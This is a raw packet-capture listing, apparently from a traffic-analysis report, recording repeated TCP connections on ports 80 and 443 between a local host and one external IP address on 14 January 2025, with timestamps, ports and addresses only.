                    Jan 14, 2025 08:24:15.389086962 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:15.434194088 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.296324968 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.296520948 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.297971010 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.297983885 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.298249006 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.299474001 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.347337008 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.893853903 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.894356966 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.894412994 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.894573927 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.894593000 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:16.894608021 CET49761443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:16.894620895 CET44349761166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.024601936 CET4977680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.029465914 CET8049776166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.029548883 CET4977680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.029668093 CET4977680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.034689903 CET8049776166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.034734964 CET4977680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.072043896 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.076915979 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.383162975 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.384628057 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.384669065 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.384891987 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.385114908 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:17.385127068 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:17.425278902 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.280972958 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.281135082 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.282535076 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.282546997 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.283329964 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.284749031 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.327333927 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.863143921 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.863367081 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.863457918 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.864362001 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.864362001 CET49777443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:18.864384890 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.864396095 CET44349777166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:18.995804071 CET4978880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.000689983 CET8049788166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.000771046 CET4978880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.000916004 CET4978880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.002906084 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.005743027 CET8049788166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.005805969 CET4978880192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.007738113 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.313546896 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.315087080 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.315123081 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.315315008 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.315608025 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:19.315623999 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:19.366194963 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.231070042 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.231334925 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.232530117 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.232541084 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.233302116 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.234534979 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.275331974 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.818475008 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.818674088 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.818862915 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.819627047 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.819627047 CET49794443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.819649935 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.819660902 CET44349794166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.946139097 CET4980580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.951013088 CET8049805166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.951150894 CET4980580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.951303005 CET4980580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.953970909 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.956310034 CET8049805166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:20.956387043 CET4980580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:20.958687067 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:21.264297009 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:21.265737057 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:21.265779972 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:21.265878916 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:21.266254902 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:21.266268015 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:21.317154884 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.181969881 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.182065010 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.183233976 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.183245897 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.184026957 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.185293913 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.231328011 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.761033058 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.761260986 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.761409998 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.761467934 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.761486053 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.761492968 CET49806443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.761497974 CET44349806166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.891904116 CET4981780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.896785021 CET8049817166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.897603989 CET4981780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.903253078 CET4981780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.905419111 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.908088923 CET8049817166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:22.908297062 CET4981780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:22.910203934 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:23.215960026 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:23.217375994 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:23.217420101 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:23.217495918 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:23.217899084 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:23.217911959 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:23.260225058 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.136075974 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.136166096 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.137598991 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.137610912 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.137918949 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.139236927 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.179332972 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.810692072 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.810837984 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.810916901 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.811741114 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.811759949 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.811775923 CET49824443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.811781883 CET44349824166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.941593885 CET4983780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.946469069 CET8049837166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.946647882 CET4983780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.946647882 CET4983780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.948091984 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.951738119 CET8049837166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:24.951859951 CET4983780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:24.952935934 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:25.259886026 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:25.261337996 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:25.261445045 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:25.261533022 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:25.261862993 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:25.261898994 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:25.300165892 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.166160107 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.166228056 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.167445898 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.167476892 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.167723894 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.176325083 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.223335981 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.759083986 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.759504080 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.759581089 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.759643078 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.759680986 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.759710073 CET49841443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.759726048 CET44349841166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.886847019 CET4985580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.891772985 CET8049855166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.891931057 CET4985580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.892167091 CET4985580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.894489050 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:26.896996975 CET8049855166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.899305105 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:26.899377108 CET4985580192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:27.204391003 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:27.205815077 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:27.205861092 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:27.205964088 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:27.206336975 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:27.206356049 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:27.256155014 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.131614923 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.131819963 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.132930994 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.132945061 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.133716106 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.141330004 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.187341928 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.723890066 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.723980904 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.724035978 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.724096060 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.724109888 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.724119902 CET49856443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.724127054 CET44349856166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.858946085 CET4986680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.863858938 CET8049866166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.864029884 CET4986680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.864157915 CET4986680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.865905046 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.869220972 CET8049866166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:28.869373083 CET4986680192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:28.870698929 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.176359892 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.177685976 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.177723885 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.177800894 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.178109884 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.178127050 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.218208075 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.078778028 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.078952074 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.080260038 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.080266953 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.081037045 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.084522009 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.127337933 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662108898 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662374973 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662439108 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663156986 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663166046 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.663182020 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663187981 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.789196014 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.794138908 CET8049880166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.794253111 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.794428110 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.796313047 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.799308062 CET8049880166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.799377918 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.801212072 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.106925011 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.108355045 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108405113 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.108479023 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108846903 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108865023 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.150276899 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.007038116 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.007116079 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.011558056 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.011579990 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.012403011 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.013696909 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.055340052 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584136009 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584656954 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584712029 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584933996 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584953070 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584969997 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584975004 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.712943077 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.717777967 CET8049891166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.717868090 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.717993975 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.719608068 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.722908020 CET8049891166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.722964048 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.724389076 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.138227940 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.139930010 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.139977932 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.140077114 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.140443087 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.140465975 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.193169117 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.045527935 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.045605898 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.047125101 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.047135115 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.047377110 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.048634052 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.095333099 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626360893 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626619101 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626684904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627667904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627667904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627687931 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.627698898 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.754168034 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.759090900 CET8049907166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.759186029 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.759468079 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.761452913 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.764337063 CET8049907166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.764461040 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.766285896 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.071767092 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.073137999 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073158026 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.073256016 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073594093 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073610067 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.127167940 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.982641935 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.982748032 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.983946085 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.983953953 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.984286070 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.988179922 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.031352997 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.574266911 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.574862003 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.575508118 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575566053 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575584888 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.575603008 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575612068 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.714101076 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.718938112 CET8049923166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.719023943 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.719219923 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.721414089 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.724037886 CET8049923166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.724097967 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.726241112 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.031873941 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.037734032 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.037820101 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.037909031 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.038252115 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.038269043 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.091185093 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.942146063 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.942257881 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.943521976 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.943527937 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.943764925 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.944978952 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.987333059 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.534532070 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.534812927 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.535588980 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535630941 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535645962 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.535660982 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535666943 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.662689924 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.667610884 CET8049937166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.671166897 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.671767950 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.674072027 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.676594019 CET8049937166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.676642895 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.678889036 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.984817028 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.013417006 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013456106 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.013506889 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013835907 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013844967 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.034225941 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.916495085 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.916563034 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.918034077 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.918040037 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.918256998 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.919434071 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.963373899 CET44349941166.62.27.188192.168.2.6
